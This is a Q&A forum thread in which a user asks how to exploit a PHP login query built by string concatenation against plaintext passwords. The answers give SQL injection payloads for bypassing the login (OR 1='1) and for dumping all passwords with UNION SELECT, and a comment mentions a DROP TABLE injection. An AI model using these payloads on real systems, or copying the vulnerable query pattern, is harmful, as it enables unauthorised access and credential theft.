0

I'm using ORM layer in databases all the time, so I don't mind about SQL injections, but a friend gave me this task and I still have no idea how to solve it.

I know the PHP script just checks if the return of the query is != null (username matching to entered username & password is found).

The query itself in PHP looks like:

$sql = "SELECT name FROM users WHERE name='".$name. "' AND password='".$password. "'";

What's the best way to archieve a return of this query != null OR retrieving valid login data (username & password). The password is stored plain in database. I know storing plain is bad and I know using PDO is good, but I have no idea how to solve this funny task he gave me, maybe because I use PDO all the time.

peke_peke
  • 441
  • 7
  • 21
  • 2
    Storing plain passwords in the database is a **big** no-no. They really should be hashed. Also, consider the case where someone inputs `'; DROP TABLE users` into this statement. Whoops, and your table is *gone*. This means you need to escape the userinputs (*never trust user input*) or use prepared statements. I recommend the latter. – Qirel Jan 28 '16 at 14:52
  • Possible duplicate of [How can I prevent SQL-injection in PHP?](http://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php) – Qirel Jan 28 '16 at 14:52
  • It's not how to prevent a SQL injection, as I told I use db abstraction layers, it's more theory. – peke_peke Jan 28 '16 at 14:53
  • 1
    `"so I don't mind about SQL injections"` - Attackers love that kind of confidence. `"The query itself in PHP looks like [...]"` - And *that*, my friend, is a SQL injection vulnerability. `"The password is stored plain in database."` - Attackers love that, too. ... More to the point, what are you actually asking? What are you trying to "solve" here? – David Jan 28 '16 at 14:56
  • You've been asked to break your ORM managed db, or you've been given a query and tell how it can be hacked? something like "if I use mysql_* functions, and I do this...." irrespectful of what you're actuallyt doing in your code? – Damien Pirsy Jan 28 '16 at 15:01
  • "What's the best way to archieve a return of this query" <-- is this your question? – Mark Ng Jan 28 '16 at 15:07
  • also while using an orm layer you should still validate user input since you dont want user names like /*a457--?..You should validate user input no matter of sql injection.. – ern Jan 28 '16 at 15:09
  • @em validation has nothing to do with security – Damien Pirsy Jan 28 '16 at 15:15
  • @DamienPirsy Do you mean an attack can't be done using current forms or these guys are wrong..https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet – ern Jan 28 '16 at 15:37
  • @ern I repeat, VALIDATION has little to do with injection. Allowing an username to contain only alphanumerical chars or letting it have spaces doesn't chang anything. `*a457-?` is a perfectly valid username if the system allows it. Also, `'''''''''''''''` is. I suspect there's a misunderstanding around the concept of "validation", so I'm not going further in the discussion – Damien Pirsy Jan 28 '16 at 15:45

2 Answers2

3

Say we have these two input variables:

$name = "iam";
$password = "aninjection";

Which results in this query:

$sql = "SELECT name FROM users WHERE name='iam' AND password='aninjection'";

And let's say now we add this to the $password variable: 

$password = "aninjection' OR 1='1";

Which results in:

$sql = "SELECT name FROM users WHERE name='iam' AND password='aninjection' OR 1='1'";

This query will now result in true and show every name from the user table. This is of course a basic example. We could also do more harm by dropping entire tables.

Daan
  • 12,099
  • 6
  • 34
  • 51
1

If you wanted to retrieve passwords you would inject

$name = "whatever";
$password = "' OR '1'='1' UNION ALL SELECT password from users;--";

This would then make the query

SELECT name FROM users WHERE name='whatever' AND password='' OR '1'='1' UNION ALL SELECT password from users;--'

See this answer for how an attacker would start to work this out from injecting into the query.

Community
  • 1
  • 1
SilverlightFox
  • 32,436
  • 11
  • 76
  • 145